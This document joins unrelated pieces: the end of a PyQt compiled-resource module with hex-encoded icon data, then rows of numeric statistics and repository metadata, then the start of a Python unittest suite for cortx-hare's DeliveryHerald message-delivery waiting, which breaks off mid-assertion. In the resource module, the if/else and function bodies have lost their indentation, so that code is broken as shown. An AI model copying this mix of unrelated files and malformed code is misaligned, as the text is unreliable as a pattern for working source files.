\x3a\x3a\x6c\xa6\x83\xf8\xa2\x0b\xe7\xd0\xdd\xfa\x7a\x49\xec\x4f\
\x9f\xb6\xa2\x51\x46\xae\x6b\x9e\x53\x07\x44\xc9\xcd\xee\x0c\x7f\
\x45\x59\x29\x9a\x99\x9c\xd8\x6d\x3e\x8a\x0e\xe7\xd0\x8e\xad\x9b\
\x50\x4b\xcb\x13\x8b\xf4\x3f\x6d\xc9\x10\xec\xc3\x39\x1d\x2a\x2f\
\xbd\x2c\x9a\x1f\xea\x96\x1a\xf3\x30\x97\xfb\x78\x9a\xff\xb7\x83\
\x07\x2c\xe6\x2a\x5b\x0a\xe3\xf5\xde\xdd\x3b\xe4\x99\xb4\x25\x0b\
\x89\x6d\x64\xe8\x60\x54\x7d\xa5\x52\x14\xff\xba\xf4\xe5\x54\xdb\
\xb3\xc9\xae\x60\x97\xc2\x7f\xa9\xb8\x48\x98\xa3\xac\xfd\x24\xf8\
\x26\x68\x5b\x3a\xfe\xbb\xe8\xe1\xc4\xc7\x35\xdc\xbb\x2b\xf8\x32\
\x6c\x83\x3e\x0d\x63\xc7\x91\x24\x27\x8c\x23\xcf\x0c\xd5\xa9\x3e\
\xf7\x34\x3f\x5d\x9e\x29\xe3\x63\xd1\xcd\xeb\xb5\xc4\x06\x7d\xde\
\xba\x0e\xbe\x4f\x4a\x44\xcf\x9f\x3f\x17\xec\xb7\x6e\x5c\xb7\x18\
\xcb\x53\x13\xe2\x04\xbf\x67\x4f\x62\x46\x84\x92\xf4\xe1\x1a\xcd\
\x1b\x9e\xe4\xbf\x51\x5b\x43\xca\x02\x9c\x8d\xf7\x1b\x7a\xb4\xd3\
\x9a\xff\x73\x36\x49\x53\x55\x51\x86\xc2\x87\x68\x88\x0d\xc6\x92\
\x3d\xa1\xfb\x1a\xe3\xa2\xb1\x2f\x96\xff\xd4\x89\xdf\x49\x59\x52\
\xe7\xce\xec\x66\x2f\xfc\x75\x9f\xc5\x18\xc7\x9f\x8d\x21\x41\xa8\
\xb6\xe6\x1a\x49\x77\x70\xff\x9e\xae\x79\x62\x5c\xb4\x5d\x7e\xba\
\x1e\x5d\xc5\x2e\x96\xff\x8f\x63\x47\x48\x59\xd2\x97\xa7\x76\xb3\
\xaf\x48\x5d\x40\xec\xe0\xb3\xe9\xb1\x92\x3a\x6f\x16\x49\x07\x7d\
\x7e\xcc\xf0\xae\x7e\x7d\xa7\xfe\xb6\x22\xf8\x61\xce\xa6\xe7\x77\
\x6b\x5f\x3f\x2e\x2a\x9c\xd8\x61\xed\x5a\x55\x59\x4e\xfa\x2f\x84\
\x57\xaf\x54\x91\xb4\x0b\xe7\xa4\x90\xb4\x65\x25\x3d\xfb\x43\x6f\
\xe2\x87\x79\x6c\x74\x84\x9e\x94\xe7\xe4\xb1\xa3\xc4\x06\xeb\x65\
\xcc\x1a\x36\xf8\x5b\xd4\xf6\xf4\xa9\x10\xbf\x6c\xd1\x3c\x92\x1e\
\xf6\x31\x58\x66\x4c\x9e\x40\xe2\xa1\x9e\x94\xc0\x0f\xb2\x3f\x3f\
\xcf\x62\x8c\xe3\x71\x0d\x73\x3b\x8e\x8f\x8f\x8d\x22\xe9\xab\xab\
\xba\xfa\x0c\xac\x19\x60\x4d\x70\xf7\x4e\x3d\x0a\x0b\x1e\x24\xc4\
\x0d\x83\xba\xb2\xb3\xd7\xf0\x36\x7e\xd8\x8b\xa4\x4c\x89\x27\x65\
\x8a\x0c\x0d\x41\x67\x4f\x9f\x42\x17\xcf\x9f\x25\x71\xa6\x19\x49\
\x16\xcf\xd0\x6d\xbd\x73\xeb\x66\xa1\x1f\xe0\xff\xaf\x48\x9d\xdf\
\xe3\x77\x79\x23\x3f\x88\xb0\x96\x89\x8e\xb0\x28\x1b\x3d\xf6\xd3\
\x97\x2d\xb6\x48\x7f\xfc\xe8\x61\x62\xc3\xed\x8e\xe7\x84\x9a\x6b\
\xd5\x8a\xe3\x07\x01\xdf\x9f\x14\x3f\xd6\xa6\xbf\x87\x75\xd1\xbe\
\x5f\x72\xd1\xb9\x33\x7f\xa2\xe2\xa2\xbf\x05\xbf\x41\x73\x63\xdd\
\xb4\x6e\x95\xc3\xef\xf1\x56\x7e\x10\x18\xb7\x90\x36\x62\xa8\xc6\
\x66\x3d\xd8\x53\x98\xff\x5b\x5b\x5b\x15\xcd\x8f\xe5\xbf\x87\x4d\
\xe8\x87\xf9\xb3\x45\xb3\x8f\x8d\x34\x92\x35\xf1\x8b\xc0\x0f\xb2\
\x3b\x27\x8b\x94\x73\x6e\x4a\x32\xda\xb2\x61\x8d\x50\x27\xf3\x66\
\x4e\x13\xf6\x7e\x99\x19\x6b\xd1\xf8\xd1\x23\xcc\x73\xde\x02\xd1\
\xf9\x2a\x85\x1f\xc6\x3b\x7e\x1e\xce\x37\x6d\x49\xf3\xa3\x47\xa8\
\xe4\x52\xb1\xc3\x3d\x8f\x12\xf9\x0b\xf6\xe5\x93\x72\x42\x5b\xcb\
\x25\xde\xc8\x5f\x7b\xed\xaa\xb0\x6f\xa3\x75\xe5\xd2\xc5\xa4\x9c\
\xf3\xf9\x3e\x7f\xfa\xe4\x09\x51\x5a\x72\xe9\x5f\xd1\xfc\x22\xb4\
\x85\xd3\xb0\xa5\x7a\xad\x6a\x35\xa7\x0e\xfc\xd2\x9a\xd1\xa0\xf5\
\xff\x02\x6c\x7c\xba\x12\x48\x8b\x9f\x81\xbb\x03\xb1\xfc\x4d\x0f\
\x1e\x20\xe3\x10\xb5\xe4\xf9\xde\x9e\x16\x5f\xbc\x20\x17\x3f\xad\
\x1d\xbc\xe6\x84\x84\xf8\xbd\x0e\x0a\x9f\xcd\x71\xb6\xd2\xee\x16\
\xcb\x0f\x7e\x1f\xd6\xf7\x72\xf2\xc3\xbe\xda\x05\xfc\x9d\xaa\x65\
\xcb\xf9\x3e\x51\x61\xb7\x9e\xd4\xec\x60\x29\xfd\x1f\xd6\x34\x9b\
\xd6\xa5\x0b\x77\x32\x58\xd3\x96\x2e\x22\x79\xc2\x7a\x60\xf9\xe2\
\x79\x0e\x15\xd6\xbe\x7b\xf3\x72\xec\xfa\x42\x39\xeb\xd9\xb6\xaa\
\x16\xca\x31\xff\xc1\x5a\x08\x9f\x89\xc2\xf8\xe8\xe9\x1c\x5c\xaa\
\xb8\x98\xff\xa4\xc9\x64\x7a\x49\x0e\x7e\x90\xf8\x98\x48\x92\x77\
\xfd\xed\x3a\xaf\xe7\x37\xe8\xd8\xaf\xe4\xf2\x7f\x20\xd0\xa7\x71\
\x1e\x62\xce\x76\x3d\xca\xaf\x66\x8f\xcb\xe9\xff\x41\xe0\x1c\x6b\
\xed\xca\xe5\xc2\x39\xa0\x5c\xe2\xb2\xb6\xd7\xaa\x26\x5b\xf0\x6b\
\x54\xb3\xb0\x2d\x6b\xdb\x66\xd9\xca\xdf\x1b\x81\x39\xc5\x55\xfc\
\x5c\x10\xfb\x99\x05\xbf\x5a\x35\x16\xdb\xe8\xb3\x4a\x4f\xca\x95\
\xca\x0a\x97\xf1\x1b\x83\x55\x6f\x5b\xac\x8d\x82\x54\x9f\x60\x1b\
\xf8\x77\x7b\x67\x72\xee\x12\x38\x63\x17\xc3\x02\x67\x2f\x30\xdf\
\xc0\x9c\x8b\xf7\x58\x8e\x14\xcf\xfb\x96\x63\x80\x3d\x86\xed\x70\
\xae\x75\xe8\xc0\x5e\xbb\x67\xd3\xae\x90\xd6\x96\x16\xe1\x3c\x78\
\xc1\xec\x19\xa2\xdb\x92\xbe\x43\xd9\xba\x71\xbd\xa8\x67\x6c\xed\
\x01\x38\xdd\x37\x9f\xf2\xb6\x87\xae\xea\x73\xae\x50\xb8\x4b\x7a\
\xdc\xdc\x4c\xf8\x53\xa6\x24\x38\xcd\x2f\xd4\x01\xbf\x6f\xe0\xed\
\x75\x9e\x64\x82\x73\x41\x63\x88\xb8\x3d\x06\x7d\x7e\x0a\x63\xc0\
\xfa\x6e\x56\x2a\xbf\x30\x17\xb0\x6c\x3f\xb3\x3f\x80\x7d\x52\xa3\
\xd4\xf2\xbb\x53\xff\xa1\xf6\x4e\xf0\xde\x81\xd8\xe7\xec\xf1\xcb\
\x29\xf4\xba\xc2\x91\xf6\xc6\xef\xc0\x7a\x9b\x3e\x83\x56\x22\x3f\
\xf8\x9d\xa6\x07\x8d\x4e\xf1\xc3\x9e\x4c\x4a\xbf\xf1\x46\x7e\xd0\
\xfc\xdc\x5d\x4e\xf1\xc3\x9d\xc3\x8b\xc0\x0f\xf7\xaa\xb4\xcc\x4c\
\x9e\x68\x33\x1d\xbc\x1f\x88\xe5\xc9\xe3\xc7\x92\xcf\xe0\xbd\x95\
\x1f\xb4\xf4\x72\xd7\x99\xd8\x91\x43\x05\x36\xd3\x1c\x2d\x2c\x70\
\x98\x46\xa9\xfc\xab\x57\x2c\x21\x6c\xcd\xcd\x8f\xba\x9d\xb7\x81\
\xcf\x87\x78\x47\x7d\x44\xa9\xfc\x11\x9c\x56\xe8\xd3\x58\xe8\xb3\
\x25\x50\x38\x6b\xc5\x22\xc5\xe7\x2b\x85\x1f\x94\x5e\xd3\x82\x8f\
\xa7\x6d\xf4\x79\x69\xf6\xf6\x4c\xc9\x79\x2b\x81\x7f\xfa\xa4\x09\
\x84\x11\xce\x07\x63\x46\x84\x09\xf1\xb1\x23\x87\x91\xf3\x42\xa9\
\x3e\x5f\x49\xfc\xa0\xf4\x3b\x53\x78\x6d\x07\xef\x0f\x60\x91\xea\
\xf3\x95\xc6\x4f\xdf\x23\xc1\x7b\x86\x10\x77\xf3\xc6\x75\xa7\x7d\
\xbe\xd2\xf8\xe1\x5d\x62\xfa\x3d\x78\xb8\x53\xed\x8d\xcf\x57\x1a\
\x3f\x28\x7d\x37\xd2\x4e\xd5\xc5\xe1\x82\xfd\x4e\xe7\xa9\x24\xfe\
\x05\xb3\xa6\x23\x5b\xe2\x8c\xcf\x57\x22\x3f\xdc\xa9\xc0\xfb\x46\
\xb4\x38\xeb\xf3\x95\xc8\x0f\x9a\x9b\xb5\xdd\x82\xdf\x59\x9f\xaf\
\x54\xfe\xf1\x63\x46\x92\xfb\xb4\xde\xf8\x7c\x8f\xf0\x53\xf7\x0a\
\xbd\xd1\xbc\xec\x1d\xc2\x6f\x09\x72\xb3\xb7\xf7\x3a\x2f\x5e\x9f\
\xb9\x8b\x9f\xd3\xa8\x22\xe5\xe0\x97\x59\xab\xdd\xc5\x3f\x24\x30\
\xb0\xbf\x5e\xc2\xef\x58\xdd\xa4\x4b\xdd\xc5\x0f\xd2\xf9\x3b\x65\
\x8f\x33\x63\xad\x35\xea\xfc\xde\x74\x27\x3f\xd3\xf9\x9b\x6a\xf8\
\x7d\xe1\x63\x0f\xb3\xff\xc5\x69\xd8\x0f\xdc\xcc\x4e\xc4\x10\x14\
\xf4\x16\xa7\x0e\x30\x9a\x7d\x42\xaa\xbb\x94\x5f\x2b\x24\x1a\xb4\
\xaa\x81\x8c\x9d\xdf\xcf\x60\xdf\xda\xc4\x30\x7d\x9a\x98\x87\xe8\
\x38\x9f\xb6\xa6\x33\xe4\x3f\x21\x64\x82\xb0\xaf\x39\xec\x67\x0e\
\xdf\x45\x9d\x7e\xc4\xd7\x2a\x9c\xe3\x25\x21\xd3\xef\x44\x67\xd8\
\x07\x63\xfa\x58\x85\xd8\xd0\xd7\x2a\xec\x67\x72\x10\x1e\x37\x87\
\x35\xe6\xb0\xd5\x1c\xf2\xab\x74\x2f\x09\x3b\x7a\x08\x85\xaa\xe1\
\x5b\x4e\x68\x42\xbe\xc5\x50\x0d\x34\xf0\xff\xf1\x64\xfe\xb2\
\x00\x00\x00\xba\
\x00\
\x00\x04\x7e\x78\x9c\x63\x60\x60\x04\x42\x01\x01\x06\x20\xa9\xc0\
\x90\xc1\xc2\xc0\x20\xc6\xc0\xc0\xa0\x01\xc4\x40\x21\xa0\x08\x44\
\x1c\x04\x0c\x58\x18\x70\x01\x41\x9c\x32\xc4\x81\x99\x40\x6c\x4c\
\x81\xfe\x55\x40\xfc\x19\x88\x6d\x29\xd0\xff\x0f\x6a\xc6\x2a\x22\
\xf0\x74\x20\x96\x43\xd3\xbf\x09\x88\xe7\x01\xf1\x6e\x22\xf0\x0b\
\x20\x9e\x84\xa6\x7f\x15\x89\xee\x5d\x85\x87\x0f\x03\xab\xa1\x98\
\x90\xfe\x95\x38\xd4\x51\xaa\xbf\x08\x8a\xc9\xd5\x8f\x0b\xd0\xcb\
\xfd\x16\x50\x4c\x48\xff\x12\x20\x3e\x0e\xc4\xa1\x44\x62\x90\xda\
\xa5\x48\xfa\x5d\x80\xf8\x09\x10\xff\x27\x12\x3f\x05\x62\x37\x2c\
\xee\xa2\x3b\xf8\x0f\x74\xcd\x7e\x20\x9e\x0f\xc4\x0d\xcc\x40\xcc\
\x08\x64\xff\x04\x66\x84\x4a\x08\x06\xb1\x61\x7c\x18\xfb\x00\x33\
\x44\x1f\x08\x03\x00\xa5\xbc\x58\x35\
"
qt_resource_name = b"\
\x00\x05\
\x00\x6f\xa6\x53\
\x00\x69\
\x00\x63\x00\x6f\x00\x6e\x00\x73\
\x00\x06\
\x07\x03\x7d\xc3\
\x00\x69\
\x00\x6d\x00\x61\x00\x67\x00\x65\x00\x73\
\x00\x09\
\x0b\x85\x9b\xdf\
\x00\x63\
\x00\x6c\x00\x65\x00\x61\x00\x72\x00\x2e\x00\x69\x00\x63\x00\x6f\
\x00\x0a\
\x0a\x92\x42\xff\
\x00\x79\
\x00\x6f\x00\x75\x00\x64\x00\x61\x00\x6f\x00\x2e\x00\x69\x00\x63\x00\x6f\
\x00\x08\
\x00\x4a\x42\xbf\
\x00\x62\
\x00\x69\x00\x6e\x00\x67\x00\x2e\x00\x69\x00\x63\x00\x6f\
\x00\x0a\
\x08\xab\xc2\xdf\
\x00\x75\
\x00\x70\x00\x64\x00\x61\x00\x74\x00\x65\x00\x2e\x00\x69\x00\x63\x00\x6f\
\x00\x0a\
\x0e\x2d\x83\x3f\
\x00\x67\
\x00\x6f\x00\x6f\x00\x67\x00\x6c\x00\x65\x00\x2e\x00\x69\x00\x63\x00\x6f\
\x00\x06\
\x04\x5c\x4f\x9f\
\x00\x41\
\x00\x49\x00\x2e\x00\x69\x00\x63\x00\x6f\
\x00\x08\
\x0a\x61\x42\x7f\
\x00\x69\
\x00\x63\x00\x6f\x00\x6e\x00\x2e\x00\x69\x00\x63\x00\x6f\
\x00\x09\
\x06\xc7\x80\xbf\
\x00\x61\
\x00\x62\x00\x6f\x00\x75\x00\x74\x00\x2e\x00\x69\x00\x63\x00\x6f\
"
qt_resource_struct_v1 = b"\
\x00\x00\x00\x00\x00\x02\x00\x00\x00\x01\x00\x00\x00\x01\
\x00\x00\x00\x00\x00\x02\x00\x00\x00\x01\x00\x00\x00\x02\
\x00\x00\x00\x10\x00\x02\x00\x00\x00\x08\x00\x00\x00\x03\
\x00\x00\x00\x54\x00\x01\x00\x00\x00\x01\x00\x00\x05\x4f\
\x00\x00\x00\x9e\x00\x00\x00\x00\x00\x01\x00\x00\x0c\x51\
\x00\x00\x00\xc6\x00\x01\x00\x00\x00\x01\x00\x00\x18\xd7\
\x00\x00\x00\x6a\x00\x01\x00\x00\x00\x01\x00\x00\x06\x9e\
\x00\x00\x00\xb0\x00\x01\x00\x00\x00\x01\x00\x00\x10\xd3\
\x00\x00\x00\x3a\x00\x01\x00\x00\x00\x01\x00\x00\x04\x82\
\x00\x00\x00\x22\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\
\x00\x00\x00\x84\x00\x00\x00\x00\x00\x01\x00\x00\x07\xcf\
"
qt_resource_struct_v2 = b"\
\x00\x00\x00\x00\x00\x02\x00\x00\x00\x01\x00\x00\x00\x01\
\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x00\x00\x02\x00\x00\x00\x01\x00\x00\x00\x02\
\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x10\x00\x02\x00\x00\x00\x08\x00\x00\x00\x03\
\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x54\x00\x01\x00\x00\x00\x01\x00\x00\x05\x4f\
\x00\x00\x01\x72\x6f\x91\x50\x5f\
\x00\x00\x00\x9e\x00\x00\x00\x00\x00\x01\x00\x00\x0c\x51\
\x00\x00\x01\x72\x6f\x97\xe0\x65\
\x00\x00\x00\xc6\x00\x01\x00\x00\x00\x01\x00\x00\x18\xd7\
\x00\x00\x01\x72\x7c\x9f\x28\xeb\
\x00\x00\x00\x6a\x00\x01\x00\x00\x00\x01\x00\x00\x06\x9e\
\x00\x00\x01\x72\x7a\x71\x32\x61\
\x00\x00\x00\xb0\x00\x01\x00\x00\x00\x01\x00\x00\x10\xd3\
\x00\x00\x01\x72\x6f\x83\xe0\x2b\
\x00\x00\x00\x3a\x00\x01\x00\x00\x00\x01\x00\x00\x04\x82\
\x00\x00\x01\x72\x6f\x8c\x29\xe3\
\x00\x00\x00\x22\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\
\x00\x00\x01\x73\x29\xe7\x60\xbf\
\x00\x00\x00\x84\x00\x00\x00\x00\x00\x01\x00\x00\x07\xcf\
\x00\x00\x01\x72\x6f\x93\x88\x0d\
"
qt_version = [int(v) for v in QtCore.qVersion().split('.')]
if qt_version < [5, 8, 0]:
rcc_version = 1
qt_resource_struct = qt_resource_struct_v1
else:
rcc_version = 2
qt_resource_struct = qt_resource_struct_v2
def qInitResources():
QtCore.qRegisterResourceData(rcc_version, qt_resource_struct, qt_resource_name, qt_resource_data)
def qCleanupResources():
QtCore.qUnregisterResourceData(rcc_version, qt_resource_struct, qt_resource_name, qt_resource_data)
qInitResources()
| 56.848881
| 103
| 0.725313
| 7,284
| 30,471
| 3.028968
| 0.042147
| 0.388886
| 0.492363
| 0.578706
| 0.428455
| 0.419209
| 0.400943
| 0.384762
| 0.373204
| 0.366269
| 0
| 0.34334
| 0.020446
| 30,471
| 535
| 104
| 56.95514
| 0.395839
| 0.004988
| 0
| 0.210019
| 0
| 0.843931
| 0.000033
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0.003854
| false
| 0
| 0.001927
| 0
| 0.00578
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
9904ceaf5f1ccf2c17130c62554748706ba26daf
| 16,623
|
py
|
Python
|
hax/test/test_delivery_herald.py
|
papan-singh/cortx-hare
|
4d6a533750dffe0b71c633a3707da79d9883b3dd
|
[
"Apache-2.0"
] | null | null | null |
hax/test/test_delivery_herald.py
|
papan-singh/cortx-hare
|
4d6a533750dffe0b71c633a3707da79d9883b3dd
|
[
"Apache-2.0"
] | null | null | null |
hax/test/test_delivery_herald.py
|
papan-singh/cortx-hare
|
4d6a533750dffe0b71c633a3707da79d9883b3dd
|
[
"Apache-2.0"
] | null | null | null |
# Copyright (c) 2020 Seagate Technology LLC and/or its Affiliates
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# For any questions about this software or licensing,
# please email opensource@seagate.com or cortx-questions@seagate.com.
#
# flake8: noqa
import logging
import sys
import unittest
from threading import Condition, Thread
from time import sleep, time
from hax.exception import NotDelivered
from hax.log import TRACE
from hax.motr.delivery import DeliveryHerald
from hax.types import HaLinkMessagePromise, MessageId
LOG = logging.getLogger('hax')
class CountDownLatch:
""" Home-made implementation of CountDownLatch from Java world.
Unblocks a single thread when all N threads have invoked count_down()
from their sides.
"""
def __init__(self, value: int):
self.lock = Condition()
self.value = value
def count_down(self):
with self.lock:
if self.value == 0:
raise RuntimeError("Already zero, nothing to count down")
self.value -= 1
if self.value == 0:
self.lock.notifyAll()
def waitfor(self):
while True:
with self.lock:
if not self.value:
return
self.lock.wait()
class TestDeliveryHeraldAny(unittest.TestCase):
"""
Tests wait_for_any() functionality.
"""
@classmethod
def setUpClass(cls):
# It seems like when unittest is invoked from setup.py,
# some default logging configuration is already applied;
# invoking setup_logging() will make the log messages to appear twice.
logging.addLevelName(TRACE, 'TRACE')
logging.getLogger('hax').setLevel(TRACE)
def test_it_works(self):
herald = DeliveryHerald()
notified_ok = True
def fn():
try:
sleep(1.5)
herald.notify_delivered(MessageId(halink_ctx=100, tag=1))
except:
logging.exception('*** ERROR ***')
notified_ok = False
t = Thread(target=fn)
t.start()
m = MessageId
herald.wait_for_any(HaLinkMessagePromise(
[m(100, 1), m(100, 3), m(100, 4)]),
timeout_sec=10)
t.join()
self.assertTrue(notified_ok,
'Unexpected exception appeared in notifier thread')
def test_exception_raised_by_timeout(self):
herald = DeliveryHerald()
notified_ok = True
def fn():
try:
sleep(1.5)
herald.notify_delivered(MessageId(halink_ctx=43, tag=3))
except:
logging.exception('*** ERROR ***')
notified_ok = False
t = Thread(target=fn)
t.start()
m = MessageId
try:
with self.assertRaises(NotDelivered):
herald.wait_for_any(HaLinkMessagePromise(
[m(42, 1), m(42, 3), m(42, 4)]),
timeout_sec=5)
finally:
t.join()
self.assertTrue(notified_ok,
'Unexpected exception appeared in notifier thread')
def test_works_under_load(self):
herald = DeliveryHerald()
notified_ok = True
def fn(msg: MessageId):
try:
sleep(1.5)
herald.notify_delivered(msg)
except:
logging.exception('*** ERROR ***')
notified_ok = False
threads = [
Thread(target=fn, args=(MessageId(100, i), ))
for i in range(1, 32)
]
for t in threads:
t.start()
def m(x):
return MessageId(halink_ctx=100, tag=x)
try:
herald.wait_for_any(HaLinkMessagePromise(
[m(99), m(25), m(28), m(31)]),
timeout_sec=5)
finally:
for t in threads:
t.join()
self.assertTrue(notified_ok,
'Unexpected exception appeared in notifier thread')
def test_if_delivered_earlier_than_awaited_wait_works(self):
herald = DeliveryHerald()
notified_ok = True
thread_count = 1
latch = CountDownLatch(thread_count)
def fn(msg: MessageId):
try:
LOG.debug('Thread started')
herald.notify_delivered(msg)
LOG.debug('Notified delivery %s', msg)
latch.count_down()
LOG.debug('Main thread unblocked')
except:
logging.exception('*** ERROR ***')
notified_ok = False
threads = [
Thread(target=fn, args=(MessageId(100, i + 1), ))
for i in range(thread_count)
]
for t in threads:
t.start()
# Block until all the threads come to latch.count_down() and thus
# the message is notified for sure
latch.waitfor()
def m(x):
return MessageId(halink_ctx=100, tag=x)
try:
herald.wait_for_any(HaLinkMessagePromise([m(1)]), timeout_sec=2)
finally:
for t in threads:
t.join()
self.assertTrue(notified_ok,
'Unexpected exception appeared in notifier thread')
self.assertEqual(0, len(herald.unsorted_deliveries.keys()))
def test_if_delivered_earlier_than_awaited_works_immediately(self):
herald = DeliveryHerald()
notified_ok = True
thread_count = 1
latch = CountDownLatch(thread_count)
def fn(msg: MessageId):
try:
LOG.debug('Thread started')
herald.notify_delivered(msg)
LOG.debug('Notified delivery %s', msg)
latch.count_down()
LOG.debug('Main thread unblocked')
except:
logging.exception('*** ERROR ***')
notified_ok = False
threads = [
Thread(target=fn, args=(MessageId(100, i + 1), ))
for i in range(thread_count)
]
for t in threads:
t.start()
# Block until all the threads come to latch.count_down() and thus
# the message is notified for sure
latch.waitfor()
def m(x):
return MessageId(halink_ctx=100, tag=x)
try:
started = time()
herald.wait_for_any(HaLinkMessagePromise([m(1)]), timeout_sec=5)
finished = time()
finally:
for t in threads:
t.join()
self.assertTrue(notified_ok,
'Unexpected exception appeared in notifier thread')
self.assertLess(
finished - started, 5,
'Awaiting thread was unblocked only by a timeout. It means '
'that unsorted_deliveries was analyzed too late.'
)
def test_if_delivered_earlier_than_awaited_wait_many(self):
herald = DeliveryHerald()
notified_ok = True
thread_count = 6
latch = CountDownLatch(thread_count)
def fn(msg: MessageId):
try:
LOG.debug('Thread started')
herald.notify_delivered(msg)
LOG.debug('Notified delivery %s', msg)
latch.count_down()
LOG.debug('Main thread unblocked')
except:
logging.exception('*** ERROR ***')
notified_ok = False
threads = [
Thread(target=fn, args=(MessageId(100, i + 1), ))
for i in range(thread_count)
]
for t in threads:
t.start()
# Block until all the threads come to latch.count_down() and thus
# the message is notified for sure
latch.waitfor()
def m(x):
return MessageId(halink_ctx=100, tag=x)
try:
herald.wait_for_any(HaLinkMessagePromise([m(1), m(5)]),
timeout_sec=2)
finally:
for t in threads:
t.join()
self.assertTrue(notified_ok,
'Unexpected exception appeared in notifier thread')
self.assertEqual(4, len(herald.unsorted_deliveries.keys()))
class TestDeliveryHeraldAll(unittest.TestCase):
"""
Tests wait_for_all() functionality.
"""
@classmethod
def setUpClass(cls):
logging.basicConfig(
level=logging.DEBUG,
stream=sys.stdout,
format='%(asctime)s {%(threadName)s} [%(levelname)s] %(message)s')
def test_it_works(self):
herald = DeliveryHerald()
notified_ok = True
def fn():
try:
sleep(1.5)
herald.notify_delivered(MessageId(halink_ctx=100, tag=1))
except:
logging.exception('*** ERROR ***')
notified_ok = False
t = Thread(target=fn)
t.start()
m = MessageId
herald.wait_for_all(HaLinkMessagePromise([m(100, 1)]), timeout_sec=5)
t.join()
self.assertTrue(notified_ok,
'Unexpected exception appeared in notifier thread')
def test_exception_raised_if_not_all_delivered(self):
herald = DeliveryHerald()
notified_ok = True
def fn():
try:
sleep(1.5)
herald.notify_delivered(MessageId(halink_ctx=42, tag=3))
except:
logging.exception('*** ERROR ***')
notified_ok = False
t = Thread(target=fn)
t.start()
m = MessageId
try:
with self.assertRaises(NotDelivered):
herald.wait_for_all(HaLinkMessagePromise([m(42, 1),
m(42, 3)]),
timeout_sec=5)
finally:
t.join()
self.assertTrue(notified_ok,
'Unexpected exception appeared in notifier thread')
def test_works_if_all_messages_confirmed(self):
herald = DeliveryHerald()
notified_ok = True
def fn():
try:
sleep(1.5)
herald.notify_delivered(MessageId(halink_ctx=42, tag=3))
herald.notify_delivered(MessageId(halink_ctx=42, tag=1))
except:
logging.exception('*** ERROR ***')
notified_ok = False
t = Thread(target=fn)
t.start()
m = MessageId
try:
herald.wait_for_all(HaLinkMessagePromise([m(42, 1),
m(42, 3)]),
timeout_sec=5)
finally:
t.join()
self.assertTrue(notified_ok,
'Unexpected exception appeared in notifier thread')
def test_works_under_load(self):
herald = DeliveryHerald()
notified_ok = True
def fn(msg: MessageId):
try:
sleep(1.5)
herald.notify_delivered(msg)
except:
logging.exception('*** ERROR ***')
notified_ok = False
threads = [
Thread(target=fn, args=(MessageId(100, i), ))
for i in range(1, 32)
]
for t in threads:
t.start()
def m(x):
return MessageId(halink_ctx=100, tag=x)
try:
herald.wait_for_all(HaLinkMessagePromise(
[m(5), m(25), m(28), m(31)]),
timeout_sec=5)
finally:
for t in threads:
t.join()
self.assertTrue(notified_ok,
'Unexpected exception appeared in notifier thread')
def test_if_delivered_earlier_than_awaited_wait_works(self):
herald = DeliveryHerald()
notified_ok = True
thread_count = 1
latch = CountDownLatch(thread_count)
def fn(msg: MessageId):
try:
LOG.debug('Thread started')
herald.notify_delivered(msg)
LOG.debug('Notified delivery %s', msg)
latch.count_down()
LOG.debug('Main thread unblocked')
except:
logging.exception('*** ERROR ***')
notified_ok = False
threads = [
Thread(target=fn, args=(MessageId(100, i + 1), ))
for i in range(thread_count)
]
for t in threads:
t.start()
# Block until all the threads come to latch.count_down() and thus
# the message is notified for sure
latch.waitfor()
def m(x):
return MessageId(halink_ctx=100, tag=x)
try:
herald.wait_for_all(HaLinkMessagePromise([m(1)]), timeout_sec=2)
finally:
for t in threads:
t.join()
self.assertTrue(notified_ok,
'Unexpected exception appeared in notifier thread')
self.assertEqual(0, len(herald.unsorted_deliveries.keys()))
def test_if_delivered_earlier_than_awaited_wait_many(self):
herald = DeliveryHerald()
notified_ok = True
thread_count = 6
latch = CountDownLatch(thread_count)
def fn(msg: MessageId):
try:
LOG.debug('Thread started')
herald.notify_delivered(msg)
LOG.debug('Notified delivery %s', msg)
latch.count_down()
LOG.debug('Main thread unblocked')
except:
logging.exception('*** ERROR ***')
notified_ok = False
threads = [
Thread(target=fn, args=(MessageId(100, i + 1), ))
for i in range(thread_count)
]
for t in threads:
t.start()
# Block until all the threads come to latch.count_down() and thus
# the message is notified for sure
latch.waitfor()
def m(x):
return MessageId(halink_ctx=100, tag=x)
try:
herald.wait_for_all(HaLinkMessagePromise([m(1), m(5)]),
timeout_sec=2)
finally:
for t in threads:
t.join()
self.assertTrue(notified_ok,
'Unexpected exception appeared in notifier thread')
self.assertEqual(4, len(herald.unsorted_deliveries.keys()))
def test_if_delivered_earlier_than_awaited_notified_immediately(self):
herald = DeliveryHerald()
notified_ok = True
thread_count = 1
latch = CountDownLatch(thread_count)
def fn(msg: MessageId):
try:
LOG.debug('Thread started')
herald.notify_delivered(msg)
LOG.debug('Notified delivery %s', msg)
latch.count_down()
LOG.debug('Main thread unblocked')
except:
logging.exception('*** ERROR ***')
notified_ok = False
threads = [
Thread(target=fn, args=(MessageId(100, i + 1), ))
for i in range(thread_count)
]
for t in threads:
t.start()
# Block until all the threads come to latch.count_down() and thus
# the message is notified for sure
latch.waitfor()
def m(x):
return MessageId(halink_ctx=100, tag=x)
try:
started = time()
herald.wait_for_all(HaLinkMessagePromise([m(1)]),
timeout_sec=2)
finished = time()
finally:
for t in threads:
t.join()
self.assertTrue(notified_ok,
'Unexpected exception appeared in notifier thread')
self.assertLess(
finished - started, 5,
